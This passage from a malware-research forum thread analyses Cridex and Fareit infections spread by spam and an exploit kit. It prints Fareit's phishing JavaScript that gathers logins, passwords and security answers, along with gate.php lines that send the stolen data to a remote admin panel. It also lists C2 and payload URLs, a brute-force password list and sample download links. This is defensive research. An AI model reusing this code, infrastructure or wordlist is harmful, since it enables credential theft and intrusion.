h00p://148.208.216.70:8080/asp/intro.php
h00p://203.172.252.26:8080/asp/intro.php
h00p://202.6.120.103:8080/asp/intro.php
h00p://203.146.208.180:8080/asp/intro.php
h00p://207.126.57.208:8080/asp/intro.php
h00p://203.80.16.81:8080/asp/intro.php
h00p://202.180.221.186:8080/asp/intro.php
Using below HTTP/POST format:
Code: Select all
POST %s HTTP/1.0
Host: %s
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: %lu
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Content-Length:
Location:
HWID
{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
Fareit Phishing code:
Image
Code: Select all
var info = encodeURIComponent('Login='+$('input#EmployerLogin1_cbsys_login_email').
val()+"\n"+'Password='+$('input#EmployerLogin1_cbsys_login_password').
val()+"\n"+$('input[name=q1]').
val()+'='+$('input[name=a1]').
val()+"\n"+$('input[name=q2]').
val()+'='+$('input[name=a2]').
val()+"\n"+$('input[name=q3]').
val()+'='+$('input[name=a3]').
Fake Credit Card Processing:
Code: Select all
function check_cc(cardnumber) {
     var cardNo = cardnumber.replace(/[^0-9]/g, "");
     if (cardNo.length < 15 || cardNo.length > 16) {
       return false;
     }
     var checksum = 0;
     var j = 1;
     var calc;
     for (i = cardNo.length - 1; i >= 0; i--) {
       calc = Number(cardNo.charAt(i)) * j;
       if (calc > 9) {
         checksum = checksum + 1;
         calc = calc - 10;
       }
       checksum = checksum + calc;
       if (j == 1) {
         j = 2;
       } else {
         j = 1;
       }
     }
     if (checksum % 10 != 0) {
       return false;
     }
Fareit Slurped Software's Credential List:http://pastebin.com/6FvcaRBf

Brute Password in Parfeit bins:
Code: Select all
phpbb      asdf       qazwsx   iloveyou   jordan     pokemon
qwerty     soccer     happy    shadow     faith      iloveyo
jesus      superman   matrix   christ     summer     mustang
abc123     michael    pass     sunshine   ashley     helpme
letmein    cheese     aaaaaa   master     buster     justin
test       internet   amanda   computer   heaven     jasmine
love       joshua     nothing  princess   pepper     orange
password1  fuckyou    ginger   tigger     hunter     testing
hello      blessed    mother   football   lovely     apple
monkey     baseball   snoopy   angel      andrew     michell
dragon     starwars   jessica  jesus1     thomas     peace
trustno1   purple     welcome  whatever   angels     secret
freedom    charlie    grace killer     daniel     william
jennifer     :
Admin Panel:
Code: Select all
var adminPanelLocation = 'h00p://62.76.177.123/if_Career/';
Admin Panel sent variable strings (NEW!)
Code: Select all
var d = adminPanelLocation + 'gate.php?done=1&bid=%YOUR-PC-NAME%&info='+info+'&rkey=' + Math['random']();
var d = adminPanelLocation + 'gate.php?bid=%YOUR-PC-NAME%&location='+encodeURIComponent(window.location)+'&rkey=' + Math['random']()
Now looks not accepting people knocking anymore...
Image

Sample download is HERE---> http://www.mediafire.com/?7zz2s7g5xli8685
#MalwareMustDie!
 #17743  by unixfreaxjp
 Thu Jan 17, 2013 11:13 pm
Buster_BSA wrote:Sample download is HERE---> http://www.mediafire.com/?7zz2s7g5xli8685
Archive Download Blocked
Oh, my..
I'm new in kernelmode, did not know there's an upload feature.
Figured it now. There you go, enjoy! =unixfreaxjp=
You do not have the required permissions to view the files attached to this post.
 #17749  by unixfreaxjp
 Fri Jan 18, 2013 6:21 am
New infection via Spam Lead to the same Cridex payload was just detected today.
Landing page:h00p://dfudont.ru:8080/forum/links/column.php
Payload downloads:
Code: Select all
http://dfudont.ru:8080/forum/links/column.php?bf=30:1n:1i:1i:33&xe=2v:1k:1m:32:33:1k:1k:31:1j:1o&d=1k&bb=a&hy=m
↑Same payload as previous findings, seems the moronz couldn't make new payload delivery on time :D
The Jars has slight changes in order to adjust to new domains, same exploits.
Pocs:
Image
Image
Anyway: new JARS, Plugindetect/Landing page and payloads I attached as samples, enjoy!
Be free to analyze deeper, please help to send to AV vendors since infector's detection ratio is still low, and they can change the payload anytime they want..
Further report: http://malwaremustdie.blogspot.jp/2013/ ... s.html#new
Special thank's to @Xylit0l for inviting me to this wonderful community. Hope to learn & contribute more! respect K.M.!
#MalwareMustDie!
You do not have the required permissions to view the files attached to this post.
 #17882  by unixfreaxjp
 Sun Jan 27, 2013 10:08 am
First of al thank's forXylit0l for inviting mehere, I(ll try to contribute the best I can. And to all of you who share for malware research in KernelMode, respect!
The new updates was detected in on Cridex/PWS infector I follow. I was writing it the analysis as details as possible in MalwareMustDie post here: http://malwaremustdie.blogspot.jp/2013/ ... prove.html , but I will share here the deeper details. Here we go.

Source of infection is same, spam leads to redirector to BHEK, they use 2.1, kinda dulll to see same scheme over and over again. You'll see the spam used for this infection here: http://blog.dynamoo.com/2013/01/ups-spa ... omaru.html
The redirector of this i.e.: h00p://www.tounichi-g.co.jp/info.htm
All of for landing page here: h00p://eziponoma.ru:8080/forum/links/column.php
Grabbed all samples and share you exploits and payload used as per I pasted here: http://pastebin.com/raw.php?i=St6E6Rjr
(was too long to write it here)

My point is, in this Cridex infection the below NEW development was detected:
Code: Select all
1. The usage of the   encryption is getting deeper, they encrypted the data
   up to the memory level now. 
2. The attempt to avoid capture also detected, the cridex was running about 
   3 sec & following by the KB*.exe which runs for about less than 5mins.
   The cmd was executed in a glimpse, and see my PCAP & file capture data 
   to view the time/speed of this new things. All is just to prevent someone
   making a post like this :-) 
3. The attempt to (need to follow this further) change system internals 
   was detected, system files in my TestPC got so corrupted & won't restart.
   The possibility of the bootkit made this becoming very interesting &
   if the theory is right, they just increased their cybercrime level
   from stealer to ransom < need the to dig-in SERIOUSLY!
4. More profile capture detected & more sent data template seen.
   Thus now they have the attachment file API code in POST session
5. The desktop data was captured and saved in registry (NEW)
1. How far the encryption go? Far!
For the Cridex sample If you unpack the sample (in my case is about.exe) you'll see what the bad guys allow you to see, thus there are trace of the garbled parts which still show the encrypted strings that they don't allow us to see.
i.e. See the part of the unpack file of the Cridex:
Image
i.e.2. See the part of the unpack binary of "Fareit"/KB00777165.exe:
Image
The marked green one shows the same pattern of encryption, while the yellow marked one is supposed to be password to be used after decrypted. Moreover the sent data is having the same pattern:
Image

2. The speed in execution
It was calibrated to execute stuff in faster way, other than the logs of file I/O I captured in the MalwareMustDie blog, you'll see the timeline overall log I upload for the explorer.exe during the infection: http://www.mediafire.com/?cojctz3hcubecoe
I breakdown the process ID for this log too as per below table
PID 2116 - about.exe http://pastebin.com/raw.php?i=GGFyU3GH
PID 2152 - cmd.exe http://pastebin.com/raw.php?i=4GgvdGSU
PID 4128 - exp%n.tmp.exe http://pastebin.com/raw.php?i=tdYAz3k8
PID 1896 - KB00777165.exe http://pastebin.com/raw.php?i=xXTs3Nwz

3. Start to detect system root & (maybe) the changes in OS system internals?
I happened to spot the registry blob made by this malware in the below section:
Code: Select all
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Sysinternals\
Process Monitor\FilterRules: 01 13 00 00 00 75 9C 00 00 00 00 00 00 00 18 00 00
00 50 00 72 00 6F 00 63 00 6D 00 6F 00 6E 00 2E 00 65 00 78 00 65 00 00
00 00 00 00 00 00 00 00 00 75 9C 00 00 00 00 00 00 00 0E 00 00 00 53 00
79 00 73 00 74 00 65 00 6D 00 00 00 00 00 00 00 00 00 00 00 77 9C 00 00
                       :
72 00 65 00 00 00 00 00 00 00 00 00 00 00 87 9C 00 00 05 00 00 00 00 10
00 00 00 24 00 55 00 70 00 43 00 61 00 73 00 65 00 00 00 00 00 00 00 00
00 00 00 87 9C 00 00 06 00 00 00 00 10 00 00 00 24 00 45 00 78 00 74 00
65 00 6E 00 64 00 00 00 00 00 00 00 00 00 00 00 92 9C 00 00 00 00 00 00
00 14 00 00 00 50 00 72 00 6F 00 66 00 69 00 6C 00 69 00 6E 00 67 00 00
00 00 00 00 00 00 00 00 00
With this blob actually looks like this:
Image
↑The system root, its information was clearly stated there. The question is why?
and again I cannot even restart my TestPC after reboot, which showing the system files has changed.
This is something new, need to be seek deeper and further.

4. Captures
The captured data functionality was also saved in the registry, I wonder why the did this,
found the below blobs:
Code: Select all
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\
Shell\Bags\1\Desktop\ItemPos1024x768(1): 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 17 00 00 00 A6 00 00 00 14 00 1F 48
BA 8F 0D 45 25 AD D0 11 98 A8 08 00 36 1B 11 03 17 00 00 00 02 00
00 00 14 00 1F 50 E0 4F D0 20 EA 3A 69 10 A2 D8 08 00 2B 30 30 9D
17 00 00 00 54 00 00 00 14 00 1F 58 60 2C 8D 20 EA 3A 69 10 A2 D7
      :
01 00 3A 42 48 4D 20 00 61 62 6F 75 74 33 2E 65 78 65 00 00 2C 00
03 00 04 00 EF BE 3A 42 E5 5B 39 42 00 78 14 00 00 00 61 00 62 00
6F 00 75 00 74 00 33 00 2E 00 65 00 78 00 65 00 00 00 1A 00 B3 00
00 00 02 00 00 00 00 00 00 00
Which means:
Image
↑Those are the shortcuts data I used in the desktop of my TestPC actually. They snapshot'ed it.
Furthermore, while reversing about.exe I found:
Code: Select all
0x001AB8   Content-Disposition
0x001ACD   name="
0x001AD5   filename="
and
Code: Select all
0x001CAE   Content-Disposition: attachment; filename=%S
↑This part is new, at least for me. looks the uploader of file was in the logic now.
Seeking this further, if you see the config of fareit I recoded it nicely to see here-->>http://pastebin.com/H9kY7bbX
...will explain its correlation to phishing functionality.

During the detection traffic communication, I found only view hostnames receiving the POST requested, which are:
Image
Mostly the other server wasn't receiving the requets well:
Image

I uploaded latest sample here. and for the unpack Crudex, Horgh looks uploaded it already in VT here: https://www.virustotal.com/file/a8de1b6 ... /analysis/
For the analysis data, captures and etc, I am not promoting anything but to centralized the data please grab it from malwaremustdie post of this case here http://malwaremustdie.blogspot.jp/2013/ ... prove.html

PS: please add information in reply, will be thankful if you also add / paste the evidence to share.
Kindly regards! @unixfreaxjp
#MalwareMustDie!
You do not have the required permissions to view the files attached to this post.
 #17886  by rinn
 Sun Jan 27, 2013 12:08 pm
Hello.
3. Start to detect system root & (maybe) the changes in OS system internals?
I happened to spot the registry blob made by this malware in the below section:
Sysinternals, and this registry key belongs to Process Monitor you or one of your forensic tools are using.

Image

is this written to registry as REG_BINARY data

Image

Best Regards,
-rin
 #17888  by unixfreaxjp
 Sun Jan 27, 2013 12:36 pm
rinn wrote:Hello.
3. Start to detect system root & (maybe) the changes in OS system internals?
I happened to spot the registry blob made by this malware in the below section:
Sysinternals, and this registry key belongs to ProcessMonitor you or one of your forensic tools are using.
is this written to registry as REG_BINARY data
-rin
It was the first time using Proces monitor for monitoring this, thank you for your information.
I'll have it remember for the next time, how about the other registry blob who shot the desktop info,
was it coming from process monitor too? I must dig more about this tool..In the mean time I revoke analysis related to the related point mentioned.

rgds
  • 1
  • 3
  • 4
  • 5
  • 6
  • 7
  • 15